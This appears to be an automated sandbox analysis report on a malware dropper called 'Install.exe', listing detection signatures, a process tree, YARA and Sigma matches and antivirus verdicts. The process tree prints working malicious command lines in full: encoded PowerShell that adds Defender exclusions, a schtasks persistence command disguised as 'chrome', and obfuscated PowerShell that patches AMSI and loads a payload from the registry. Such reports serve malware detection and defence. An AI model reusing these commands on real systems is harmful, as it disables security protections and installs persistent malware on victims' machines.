
Windows Analysis Report
Install.exe

Overview

General Information

Sample Name: Install.exe
Analysis ID: 597646
MD5: 280bfd5ea1f41586ea0ef60ee44bc8db
SHA1: 57aa866f42bccbaceed938390001148323d033c1
SHA256: a6ca5523fce6a4a43964319c35ecb868186465309e9226ab07c158519a5ef6f9
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Hooks registry keys query functions (used to hide registry keys)
Uses nslookup.exe to query domains
Encrypted powershell cmdline option found
Allocates memory in foreign processes
Creates files in the system32 config directory
Hooks processes query functions (used to hide processes)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Creates a thread in another existing process (thread injection)
Hooks files or directories query functions (used to hide files and directories)
Uses schtasks.exe or at.exe to add and modify task schedules
Found suspicious powershell code related to unpacking or dynamic code loading
Writes to foreign memory regions
.NET source code references suspicious native API functions
Very long command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Potential dropper URLs found in powershell memory
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Creates job files (autostart)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Suspicious Execution of Powershell with Base64

Classification

  • System is w10x64
  • Install.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\Install.exe" MD5: 280BFD5EA1F41586EA0EF60EE44BC8DB)
    • ChiefKeefofficialnaxyi_crypted(6).exe (PID: 6820 cmdline: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe MD5: D55DC38B4EE6BED2168E74194533C572)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AppLaunch.exe (PID: 6900 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
    • 34432.exe (PID: 6836 cmdline: C:\Users\user\AppData\Roaming\34432.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C)
      • cmd.exe (PID: 7012 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 7048 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
        • powershell.exe (PID: 6856 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • nslookup.exe (PID: 7056 cmdline: C:\Windows\System32\nslookup.exe MD5: AF1787F1DBE0053D74FC687E7233F8CE)
      • cmd.exe (PID: 5412 cmdline: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 1584 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 6552 cmdline: cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • chrome.exe (PID: 5460 cmdline: C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C)
          • cmd.exe (PID: 6892 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 5728 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
  • powershell.exe (PID: 6372 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6940 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)" MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 2280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • dllhost.exe (PID: 2324 cmdline: C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9} MD5: 2528137C6745C4EADD87817A1909677E)
      • winlogon.exe (PID: 572 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
      • lsass.exe (PID: 612 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
      • svchost.exe (PID: 724 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 900 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • dwm.exe (PID: 984 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
  • chrome.exe (PID: 6564 cmdline: C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C)
    • cmd.exe (PID: 3784 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4916 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
No configs have been found
Source: C:\Users\user\AppData\Roaming\34432.exe, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Source: 33.2.chrome.exe.fa0000.0.unpack, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Source: 30.0.chrome.exe.20000.0.unpack, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Source: 30.2.chrome.exe.20000.0.unpack, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Source: 4.0.34432.exe.770000.0.unpack, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Source: 4.2.34432.exe.770000.0.unpack, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle

System Summary

Source: Process started | Author: Florian Roth | Data: Command: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay, CommandLine: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 2324, ParentProcessName: dllhost.exe, ProcessCommandLine: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay, ProcessId: 724, ProcessName: svchost.exe
Source: DNS query | Author: Brandon George (blog post), Thomas Patzke (rule) | Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, QueryName: ip-api.com
Source: Process started | Author: frack113 | Data: Command: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7012, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , ProcessId: 7048, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\Install.exe, ProcessId: 6752, TargetFilename: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7012, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , ProcessId: 7048, ProcessName: powershell.exe
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132928152596023668.7048.DefaultAppDomain.powershell

AV Detection

Source: C:\Users\user\AppData\Roaming\34432.exe | Avira: detection malicious, Label: HEUR/AGEN.1221921
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe | Avira: detection malicious, Label: HEUR/AGEN.1221921
Source: Install.exe | Virustotal: Detection: 41%
Source: Install.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\34432.exe | Virustotal: Detection: 34%
Source: C:\Users\user\AppData\Roaming\34432.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe | Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\34432.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe | Joe Sandbox ML: detected
Source: 22.0.nslookup.exe.140000000.2.unpack | Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.10.unpack | Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.0.unpack | Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.8.unpack | Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.3.unpack | Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.1.unpack | Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.4.unpack | Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.5.unpack | Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.1.unpack | Avira: Label: RKIT/Agent.avskt
Source: 39.0.dllhost.exe.140000000.8.unpack | Avira: Label: RKIT/Agent.avskt
Source: 22.2.nslookup.exe.140000000.0.unpack | Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.5.unpack | Avira: Label: RKIT/Agent.avskt
Source: 39.2.dllhost.exe.140000000.0.unpack | Avira: Label: RKIT/Agent.avskt
Source: 39.0.dllhost.exe.140000000.12.unpack | Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.6.unpack | Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.0.unpack | Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.10.unpack | Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.6.unpack | Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.12.unpack | Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.3.unpack | Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.4.unpack | Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.2.unpack | Avira: Label: RKIT/Agent.avskt
Source: Install.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Install.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: x64\Release\r77-x64.pdb source: svchost.exe
